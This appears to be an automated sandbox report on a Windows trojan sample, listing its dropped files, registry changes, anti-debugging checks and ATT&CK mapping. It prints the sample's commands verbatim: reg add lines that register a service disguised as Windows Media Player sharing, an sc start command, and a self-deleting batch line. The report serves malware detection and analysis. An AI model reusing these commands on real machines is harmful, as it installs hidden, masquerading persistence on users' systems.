Source: C:\Users\user\Desktop\vm-uw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Windows\Fonts\systkm32\1.iniJump to behavior
Source: vm-uw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: vm-uw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: vm-uw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: vm-uw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: vm-uw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: vm-uw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: vm-uw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: vm-uw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: srvany.pdb source: vm-uw.exe, 00000000.00000003.2113641386.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, vm-uw.exe, 00000000.00000003.2113871549.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, svchost.exe, 00000012.00000000.2216197964.0000000001001000.00000020.00000001.01000000.00000007.sdmp, svchost.exe.0.dr
Source: Binary string: srvany.pdbl"U source: vm-uw.exe, 00000000.00000003.2113641386.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, vm-uw.exe, 00000000.00000003.2113871549.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, svchost.exe, 00000012.00000000.2216197964.0000000001001000.00000020.00000001.01000000.00000007.sdmp, svchost.exe.0.dr
Source: Binary string: H:\Work\haozip\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: vm-uw.exe
Source: vm-uw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: vm-uw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: vm-uw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: vm-uw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: vm-uw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E51C0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001E51C0
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0021BDB6 push ecx; ret 0_2_0021BDC9
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0022BE63 push ecx; ret 0_2_0022BE76
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0022BE89 push ecx; ret 0_2_0022BE76
Source: C:\Windows\Fonts\systkm32\svchost.exeCode function: 18_2_010021E0 push eax; ret 18_2_010021F4
Source: C:\Windows\Fonts\systkm32\svchost.exeCode function: 18_2_010021E0 push eax; ret 18_2_0100221C
Source: C:\Windows\Fonts\systkm32\svchost.exeCode function: 18_2_0100225B push ecx; ret 18_2_0100226B

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Windows\Fonts\systkm32\csrss.exeJump to dropped file
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Windows\Fonts\systkm32\svchost.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Fonts\systkm32\csrss.exeJump to behavior
Source: unknownExecutable created and started: C:\Windows\Fonts\systkm32\svchost.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Windows\Fonts\systkm32\csrss.exeJump to dropped file
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Windows\Fonts\systkm32\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Windows\Fonts\systkm32\csrss.exeJump to dropped file
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Windows\Fonts\systkm32\svchost.exeJump to dropped file
Source: C:\Windows\SysWOW64\reg.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WMPNetworkSxcJump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WMPNetworkSxcJump to behavior
Source: C:\Windows\Fonts\systkm32\svchost.exeCode function: 18_2_01001D2C StartServiceCtrlDispatcherA,GetLastError,ExitProcess,18_2_01001D2C
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start WMPNetworkSxc
Source: C:\Users\user\Desktop\vm-uw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2Jump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E18A0 rdtsc 0_2_001E18A0
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_00224F98 FindFirstFileExW,0_2_00224F98
Source: reg.exe, 0000000F.00000002.2184764355.0000000002890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\Fonts\systkm32\C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /freg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /fWinsta0\Default=::=::\=C:=C:\Windows\Fonts\systkm32=ExitCode=00000000ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsH
Source: reg.exe, 0000000F.00000002.2184824190.0000000002A00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\Fonts\systkm32\C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /freg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /fWinsta0\Defaulta$Z
Source: reg.exe, 0000000F.00000002.2184878475.0000000002D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regaddHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters/vApplication/dC:\ProgramFiles(x86)\VMware\VMwareWorkstation\vmware.exe -x C:\Windows\Logs\ubu\3333.vmx/treg_sz/fOneDri
Source: reg.exe, 0000000F.00000002.2184764355.0000000002890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /f
Source: vv.bat.0.drBinary or memory string: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /f

Anti Debugging

barindex
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E1A900_2_001E1A90
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E1B000_2_001E1B00
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E18A0 rdtsc 0_2_001E18A0
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0021BB7B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0021BB7B
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E51C0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001E51C0
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_002217B3 mov eax, dword ptr fs:[00000030h]0_2_002217B3
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_00225C60 GetProcessHeap,0_2_00225C60
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0021BB7B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0021BB7B
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0021BD0E SetUnhandledExceptionFilter,0_2_0021BD0E
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0021AFAC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0021AFAC
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0021EF9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0021EF9A
Source: C:\Windows\Fonts\systkm32\svchost.exeCode function: 18_2_0100229A SetUnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0100229A
Source: C:\Users\user\Desktop\vm-uw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\systkm32\vv.bat" "Jump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\HZ~F6EC.tmp.bat"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com mode con: cols=16 lines=2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Fonts\systkm32\csrss.exe C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v Description /d "Shares Windows Media Player libraries to other networked players and media devices using Universal Plug and Play." /t reg_sz /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v DisplayName /d "Windows Media Player Network Sharing Service." /t reg_sz /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\ParametersJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v AppDirectory /d "C:\Windows\Fonts\systkm32" /t reg_sz /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start WMPNetworkSxcJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regini.exe regini 1.iniJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2Jump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E16C0 cpuid 0_2_001E16C0
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0022450B GetSystemTimeAsFileTime,0_2_0022450B
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_002189EC GetVersionExW,0_2_002189EC
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E1CE0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,InitializeCriticalSection,0_2_001E1CE0
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E1D80 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_001E1D80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Command and Scripting Interpreter
34
Windows Service
34
Windows Service
22
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts13
Service Execution
1
Scripting
11
Process Injection
1
Modify Registry
LSASS Memory31
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
Security Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
System Network Configuration Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets3
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1455404 Sample: vm-uw.exe Startdate: 11/06/2024 Architecture: WINDOWS Score: 96 41 Antivirus / Scanner detection for submitted sample 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 Drops executables to the windows directory (C:\Windows) and starts them 2->45 47 4 other signatures 2->47 7 vm-uw.exe 6 2->7         started        11 svchost.exe 2->11         started        13 svchost.exe 2->13         started        process3 file4 33 C:\Windows\Fonts\systkm32\csrss.exe, PE32 7->33 dropped 35 C:\Windows\Fonts\systkm32\vv.bat, ASCII 7->35 dropped 37 C:\Windows\Fonts\systkm32\svchost.exe, PE32 7->37 dropped 49 Drops PE files with benign system names 7->49 51 Potentially malicious time measurement code found 7->51 15 cmd.exe 2 7->15         started        18 cmd.exe 1 7->18         started        signatures5 process6 signatures7 53 Uses ping.exe to sleep 15->53 55 Uses cmd line tools excessively to alter registry or file data 15->55 57 Drops executables to the windows directory (C:\Windows) and starts them 15->57 59 Uses ping.exe to check the status of other devices and networks 15->59 20 PING.EXE 1 15->20         started        23 conhost.exe 15->23         started        25 regini.exe 1 15->25         started        31 11 other processes 15->31 27 conhost.exe 18->27         started        29 PING.EXE 1 18->29         started        process8 dnsIp9 39 127.0.0.1 unknown unknown 20->39

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
vm-uw.exe71%ReversingLabsWin32.Trojan.Zusy
vm-uw.exe100%AviraTR/Reconyc.cciah
SourceDetectionScannerLabelLink
C:\Windows\Fonts\systkm32\csrss.exe0%ReversingLabs
C:\Windows\Fonts\systkm32\svchost.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://haozip.2345.cc/0%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://haozip.2345.cc/vm-uw.exefalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
IP
127.0.0.1
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1455404
Start date and time:2024-06-11 19:42:06 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 43s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:24
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:vm-uw.exe
Detection:MAL
Classification:mal96.troj.evad.winEXE@38/6@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 72
  • Number of non-executed functions: 90
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: vm-uw.exe
No simulations
No context
No context
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
C:\Windows\Fonts\systkm32\csrss.exedggw.exeGet hashmaliciousUnknownBrowse
    dgbw.exeGet hashmaliciousUnknownBrowse
      C:\Windows\Fonts\systkm32\svchost.exedggw.exeGet hashmaliciousUnknownBrowse
        dgbw.exeGet hashmaliciousUnknownBrowse
          nM8qahLjTF.exeGet hashmaliciousYoung LotusBrowse
            8oXaMcy3Eu.exeGet hashmaliciousUnknownBrowse
              MDE_File_Sample_5bfba9887701ce013ac7d8a80380b3f54f21e0e3.zipGet hashmaliciousUnknownBrowse
                fillProxy_for_terminal_20210702_v1.0.0.exeGet hashmaliciousUnknownBrowse
                  fillProxy_for_terminal_20210702_v1.0.0.exeGet hashmaliciousUnknownBrowse
                    wk.exeGet hashmaliciousXmrigBrowse
                      888888.exeGet hashmaliciousETERNALBLUE GhostRat XmrigBrowse
                        Process:C:\Users\user\Desktop\vm-uw.exe
                        File Type:ASCII text, with no line terminators
                        Category:modified
                        Size (bytes):132
                        Entropy (8bit):4.717649701325578
                        Encrypted:false
                        SSDEEP:3:CxK6OWR2N2+WTKCXBALW9VCSLVLx695ON2+WTKC8m:CxBR2N2RGo3CSLpA9IN2RG7m
                        MD5:620ACF8E7B2F70716670A63E0385328C
                        SHA1:174A65757E136944AF23DC3D02ADBAB3BEC35F0F
                        SHA-256:2D5B93EACBB86909B2ED55D5A7C2CF2AF4C392A633342EEA3890A3A9AA9EB1C0
                        SHA-512:C4CF92493798C25C945BA8377F450444473804619F5C8151096F10F75A03802CBE5E7EF3AC1D36DD24C8ADB4DEF781BC07FFA32EFD217513765B173EF1186962
                        Malicious:false
                        Preview:if not exist "C:\Users\user\Desktop\vm-uw.exe" (del %0) else (ping 127.0.0.1 -n 2&del "C:\Users\user\Desktop\vm-uw.exe"&%0)
                        Process:C:\Windows\SysWOW64\cmd.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):74
                        Entropy (8bit):4.978458988199209
                        Encrypted:false
                        SSDEEP:3:aCdgLCgT/K/TvvKXO2EF+F4cn:mLC6/KbKXO2E8n
                        MD5:33568E8BAAB39EF9097F9B78FE231FB1
                        SHA1:45C01839B0AFEF46EBFB4A884AB3FF24EF6ECD49
                        SHA-256:E5C492B214D845AF45727327E9AECACBD9632D1AA6DCFB0308ABCDB18CA4D5E8
                        SHA-512:F6F432C0ACED10FB60AA148939EC9EFA7830B98EAF8B4B93C16DC74E9955D712056F4462F93D668CFD4D9B7FF2CAB1A823F918EC0B4261F40933075F9A16C2DE
                        Malicious:false
                        Preview:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc [19] ..
                        Process:C:\Users\user\Desktop\vm-uw.exe
                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):18432
                        Entropy (8bit):5.536012760236597
                        Encrypted:false
                        SSDEEP:384:tD7x2ARjcLagJm8lGJ3BY+SpzV5hdfjWNwG:5hRjyppV+8dYwG
                        MD5:C43D1B84143FB2561F22E1A2C8FACF53
                        SHA1:3F1357007F61F02F97F0AAABB8756C6ECA2ACEBD
                        SHA-256:BBF4C224F9861B2C1F5A1364EE71E38728495B2709621763053B979BA88522F1
                        SHA-512:27A25AB6045498E0B7131BE58556C685DFA01596675C3AF689E61D8329E1A0EFF4128C57E202C32C69271B84F57E7425C45FB5FA132EC0F5B352F86323FFA13E
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Joe Sandbox View:
                        • Filename: dggw.exe, Detection: malicious, Browse
                        • Filename: dgbw.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[.2...............2.*...................@....@..................................................................................................................................................................................................text....(.......*.................. ..`.bss.... ....@...........................rdata..i....`......................@..@.data...|....p.......0..............@....idata...............@..............@....reloc...............D..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\vm-uw.exe
                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):8192
                        Entropy (8bit):5.259110186515502
                        Encrypted:false
                        SSDEEP:96:8ldfxd/yKaP64DMI1XT3kaiyMlH38ZldnXFADkYLyAFdfcdTbGu00C:mSP64DMI1DkHMZ36kYLxFdfcdnGu00C
                        MD5:4635935FC972C582632BF45C26BFCB0E
                        SHA1:7C5329229042535FE56E74F1F246C6DA8CEA3BE8
                        SHA-256:ABD4AFD71B3C2BD3F741BBE3CEC52C4FA63AC78D353101D2E7DC4DE2725D1CA1
                        SHA-512:167503133B5A0EBD9F8B2971BCA120E902497EB21542D6A1F94E52AE8E5B6BDE1E4CAE1A2C905870A00D772E0DF35F808701E2CFBD26DCBB130A5573FA590060
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Joe Sandbox View:
                        • Filename: dggw.exe, Detection: malicious, Browse
                        • Filename: dgbw.exe, Detection: malicious, Browse
                        • Filename: nM8qahLjTF.exe, Detection: malicious, Browse
                        • Filename: 8oXaMcy3Eu.exe, Detection: malicious, Browse
                        • Filename: MDE_File_Sample_5bfba9887701ce013ac7d8a80380b3f54f21e0e3.zip, Detection: malicious, Browse
                        • Filename: fillProxy_for_terminal_20210702_v1.0.0.exe, Detection: malicious, Browse
                        • Filename: fillProxy_for_terminal_20210702_v1.0.0.exe, Detection: malicious, Browse
                        • Filename: wk.exe, Detection: malicious, Browse
                        • Filename: 888888.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........6.n.e.n.e.n.e<f.e.n.e<f.e.n.e.n.e.n.e1f.e.n.e<f.e.n.eRich.n.e........PE..L......>............................O .......0...............................@................... ...........................#..d.......................................................................@............................................text...P........................... ..`.data........0......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\vm-uw.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1152
                        Entropy (8bit):5.3887292706534735
                        Encrypted:false
